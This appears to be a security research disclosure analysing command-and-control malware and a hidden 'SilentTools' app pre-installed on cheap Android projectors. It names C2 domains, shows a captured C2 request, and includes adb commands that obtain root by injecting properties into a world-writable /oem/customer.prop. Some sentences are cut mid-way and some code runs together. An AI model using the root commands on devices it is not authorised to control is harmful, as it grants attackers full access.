对中国Beamer的C2网络的剖析 - SilentSDK-Analysis
Technical Analysis Report — Security Research
Affected Devices: Multiple Android projectors of beamer brands like the Nonete (e.g., Model HY260Pro) (likely also several projectors from Magcubic, Hotack, Huyukang and many more, as these companies distribute similar models and there are indications supporting this)
Chipset Platform: Allwinner H713 / sun50iw12p1 — potentially affects all devices on this platform
Analysis Period: April 11–17, 2026
Classification: Pre-installed Command-and-Control infrastructure with Remote Access Trojan payload
api.pixelpioneerss.com), extracts sensitive device IDs, and can download and execute arbitrary additional malicious code with root privileges at any time (chmod 777). Additionally, the devices feature open root backdoors.*.aodintech.com, api.pixelpioneerss.com, sta.smartinnovate.net) must be blocked at the network level. Affected users can only disable the malicious apps manually via ADB, as they are deeply embedded in the system.The malware infrastructure documented in this report is pre-installed on Android projectors currently being sold in large quantities to end consumers on Amazon, eBay, and AliExpress. The affected devices span possibly multiple brand names (Hotack, Huyukang, Magcubic, Nonete, among others). Identical C2 infrastructure has been independently confirmed on other devices from the same manufacturer (see Section 13). The pattern matches the BADBOX cases.
Purchased Device: Amazon Link - Nonete Mini Beamer 4K 1080P
| Property | Value |
|---|---|
| Brand Name | Nonete HY260Pro (model sold by multiple companies) |
| Internal Model Name | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| Operating System | SpectraOS (Android 11, Kernel 5.4.99) |
| Real Build Fingerprint | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Spoofed Build Fingerprint | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (no enforcement) |
| Platform Signing Key | Public AOSP Test Key |
| OEM Certificate | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Firmware Channel | HY260Pro_SpectraOS_TPYB |
Note on scope: The Allwinner H713 chipset is built into numerous cheap Android projectors sold under changing brand names in the European market. The identical firmware base (h713_tuna_p3) and identical C2 operator (Shenzhen Aodin Technology) strongly suggest that all devices from this OEM contain the same infrastructure.
| Step | Action | Result |
|---|---|---|
| 1 | Wireshark capture of network traffic | HTTP traffic to store-api.aodintech.com |
| 2 | Decoding of the gzip-compressed C2 response | 7 apps, including hidden "SilentTools" |
| 3 | AES-CBC decryption of the download path | Key [REDACTED], URL to .bpp file |
| 4 | Root exploit via /oem/customer.prop | uid=0(root) after property injection |
| 5 | Forensic dump of /data, /oem, /system | APKs, databases, configurations |
| 6 | Static analysis of StoreOS DEX | pm install -r -d, byte-reversal protection |
| 7 | Reverse engineering the reverseLen mechanism | Understanding of the anti-analysis protection |
| 8 | Breaking the byte-reversal protection | Decrypted, analyzable SilentSDK DEX |
| 9 | XOR decryption of SilentSDK strings | C2 domain api.pixelpioneerss.com confirmed |
| 10 | Hash verification across three sources | MD5/SHA-256 match perfectly |
| 11 | Reverse engineering the malware download process | Servers still online |
| 12 | Reverse engineering the malware | Plugin-based Rat Framework |
Root access was achieved through a combination of three vulnerabilities:
/oem — The partition is mounted as FAT with fmask=0000.customer.prop loaded at boot — Overwrites system properties.```bash
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writableadb shell 'echo "ro.debuggable=1" >> /oem/customer.prop' adb shell 'echo "service.adb.root=1" >> /oem/customer.prop' adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root adb shell id
**影响:** 任何拥有物理访问权限的用户或同一网络上的攻击者(通过ADB,端口5555开放,无身份验证)均可获取完全 root 访问权限。
---
## 4. C2 服务器响应 — 核心证据
### 捕获的 HTTP 请求```http
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12
gzip压缩的响应包含一个包含七个应用的JSON列表。其中六个是常规流媒体应用(YouTube、Netflix、迪士尼+、Prime Video、Chrome、BrowseHere)。第七个是SilentTools:
| App | Package | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv | true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus | true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient | true | false | false | false | 0 |
| Chrome | com.android.chrome | true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom | true | false | false | false | 0 |
| BrowseHere | com.tcl.browser | true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk | false | true | false | true | 1 |